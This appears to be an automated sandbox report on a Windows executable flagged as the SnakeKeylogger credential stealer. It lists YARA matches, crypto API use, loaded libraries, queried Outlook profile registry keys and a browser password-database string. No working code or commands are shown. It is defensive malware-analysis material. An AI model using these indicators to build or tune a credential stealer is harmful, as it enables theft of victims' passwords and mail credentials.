                Source: 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: Process Memory Space: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe PID: 6748, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.raw.unpack, -A-.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.raw.unpack, -A-.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.raw.unpack, -A-.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.raw.unpack, -A-.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: classification engineClassification label: mal100.troj.spyw.winEXE@1/0@4/4
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeMutant created: NULL
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCommand line argument: 08A0_2_00413780
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002A13000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.00000000029DF000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.00000000029EE000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeReversingLabs: Detection: 50%
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: _.pdb source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeStatic PE information: real checksum: 0x23bfb should be: 0x36a3f
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0040E21D push ecx; ret 0_2_0040E230
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0216E558 push eax; iretd 0_2_0216E559
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_061CC4EA push es; iretd 0_2_061CC4FC
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0642FB1E push es; ret 0_2_0642FB20
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_070A934F push es; ret 0_2_070A9360
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
